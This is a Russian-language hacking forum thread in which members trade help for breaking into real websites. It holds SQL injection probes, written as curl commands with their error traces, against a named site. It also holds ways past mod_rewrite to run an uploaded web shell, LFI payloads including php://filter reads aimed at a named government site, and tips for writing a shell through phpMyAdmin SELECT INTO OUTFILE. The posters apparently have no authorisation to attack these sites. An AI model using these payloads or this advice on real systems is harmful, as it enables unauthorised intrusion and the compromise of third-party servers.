Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    у меня таких много, если кто может помочь разобраться скину еще.
     
  2. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    была там скуль, натравили наверно стопитцот sqlmap'ов -_- , всё уже закрыли
    децл лога осталось, не обычная кстати скуль была....
    Code:
    curl 'https://mixdrop.ru/?ref=100/*fff*/'
    Syntax error, unexpected token *, near to 'fff*/ AND ip = '*.*.*.*' LIMIT :APL0:', when parsing: SELECT [Ref].* FROM [Ref] WHERE user_id = 100/*fff*/ AND ip = '*.*.*.*' LIMIT :APL0: (90)<br><pre>#0 [internal function]: Phalcon\Mvc\Model\Query->parse()
    #1 [internal function]: Phalcon\Mvc\Model\Query->execute()
    #2 /var/www/admin/data/www/mixdrop.ru/app/models/Ref.php(13): Phalcon\Mvc\Model::findFirst('user_id = 100/*...')
    #3 /var/www/admin/data/www/mixdrop.ru/app/controllers/GamesController.php(11): Ref::findFirst('user_id = 100/*...')
    #4 [internal function]: GamesController->indexAction()
    #5 [internal function]: Phalcon\Dispatcher->dispatch()
    #6 /var/www/admin/data/www/mixdrop.ru/public/index.php(29): Phalcon\Mvc\Application->handle()
    #7 {main}</pre>
    
    curl 'https://mixdrop.ru/?ref=90+or+user_id=a()'
    SQLSTATE[42000]: Syntax error or access violation: 1305 FUNCTION mixdrop.ru.a does not exist<br><pre>#0 [internal function]: PDOStatement->execute()
    #1 [internal function]: Phalcon\Db\Adapter\Pdo->executePrepared(Object(PDOStatement), Array, Array)
    #2 [internal function]: Phalcon\Db\Adapter\Pdo->query('SELECT `ref`.`i...', Array, Array)
    #3 [internal function]: Phalcon\Mvc\Model\Query->_executeSelect(Array, Array, Array)
    #4 [internal function]: Phalcon\Mvc\Model\Query->execute()
    #5 /var/www/admin/data/www/mixdrop.ru/app/models/Ref.php(13): Phalcon\Mvc\Model::findFirst('user_id = 90 o...')
    #6 /var/www/admin/data/www/mixdrop.ru/app/controllers/GamesController.php(11): Ref::findFirst('user_id = 90 o...')
    #7 [internal function]: GamesController->indexAction()
    #8 [internal function]: Phalcon\Dispatcher->dispatch()
    #9 /var/www/admin/data/www/mixdrop.ru/public/index.php(29): Phalcon\Mvc\Application->handle()
    #10 {main}</pre>
    
     
    _________________________
  3. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    очень похож, но это скорее скрипт который показывает всякую серверную инфу, чекает функции и т.д., не нашел пока как через него залиться можно
    сорцы если что https://github.com/jakehu/phpinfo-by-yahei/blob/master/tz.php
     
    _________________________
  4. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Я тоже н не нашёл, ну я там особо не глядел, там есть коннект к БД. И Возможно, скорее всего залиться через него варианта не будет. Это как бы техничиский монитор
     
  5. Lazy

    Lazy New Member

    Joined:
    19 Jul 2011
    Messages:
    94
    Likes Received:
    2
    Reputations:
    3
    Закинул я шелл в upload : site.com/upload/shell
    Но админ переписал mod_rewrite так , что в урл к файлу прибавляется автоматом .html : site.com/upload/shell.html
    Сервер шелл не хочет открывать - такого файла у него нет .
    Я пробую добавить null byte после имени файла в браузере и теперь имя корректно.
    Но фаил все равно не открывается . И даже открывать адрес site.com/index.html%00 сервер все равно не желает .
    Можно ли как-то победить rewrite или мертвый номер ?
     
  6. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    залить свой .htaccess в котором вырубить все модреврайты к чертям, или хедлер html->php добавить в .htaccess, ну это если есть возможность свой .htaccess загрузить
     
    _________________________
  7. Lazy

    Lazy New Member

    Joined:
    19 Jul 2011
    Messages:
    94
    Likes Received:
    2
    Reputations:
    3
    Увы но htaccess никак не войдет .
    Остается или победить rewrite , или искать локальных инклудов . Хотя похоже их тоже негусто .
     
  8. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    хм как же сайт работает, то есть если на сайте динамические элементы есть, формы там всякие, то php как то прикручен
    надо глянуть в сорцы страницы с какой нить формой, что там?
    <form action="....
    --------------
    может там что то типа
    AddType application/x-httpd-php .html .htm
    настроено)
    пробовал шелл с расширением .html загрузить?
     
    _________________________
  9. MDen1s

    MDen1s New Member

    Joined:
    12 Jul 2015
    Messages:
    17
    Likes Received:
    3
    Reputations:
    0
  10. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
  11. MDen1s

    MDen1s New Member

    Joined:
    12 Jul 2015
    Messages:
    17
    Likes Received:
    3
    Reputations:
    0
    А как-то можно проинклудить?
     
  12. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    пробуйте другие способы, их огромное количество
     
    _________________________
    t0ma5 likes this.
  13. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    1)
    PHP:
    http://www.mogalakwena.gov.za/index.php?page=php://filter/convert.base64-encode/resource=index
    2) инклудить сессию
    3)
    PHP:
    http://www.mogalakwena.gov.za/index.php?page=http://www.mogalakwena.gov.za/index.php?page=demographics%00
    что ещё можно придумать ?
     
  14. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    Есть root от phpmyadmin, знаю путь, пытаюсь залить шелл через select into outfile
    мне выдает ошибку "#1 - Can't create/write to file 'путь/test.php' (Errcode: 13) "

    Подскажите что можно еще придумать?
     
  15. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,183
    Likes Received:
    618
    Reputations:
    690
    _________________________
    yarbabin likes this.
  16. blackbox

    blackbox Elder - Старейшина

    Joined:
    31 Dec 2011
    Messages:
    362
    Likes Received:
    62
    Reputations:
    11
    Попробуй в /tmp записать, возможно это проблема с правилами безопасности mysqld.
     
  17. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    в /tmp пишется
     
  18. blackbox

    blackbox Elder - Старейшина

    Joined:
    31 Dec 2011
    Messages:
    362
    Likes Received:
    62
    Reputations:
    11
    Значит, скорее всего, в другие папки писать не получится, даже если есть права на запись, потому что так настроен мускуль (но попробовать стоит). Можно попытаться найти lfi и использовать в паре с этой багой.
     
  19. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    нельзя писать в директорию, но как вариант можно попробовать запись в существующий файл, вдруг права другие
     
    _________________________
  20. blackbox

    blackbox Elder - Старейшина

    Joined:
    31 Dec 2011
    Messages:
    362
    Likes Received:
    62
    Reputations:
    11
    Mysql не пишет в сущестувющие файлы, будет выдана ошибка.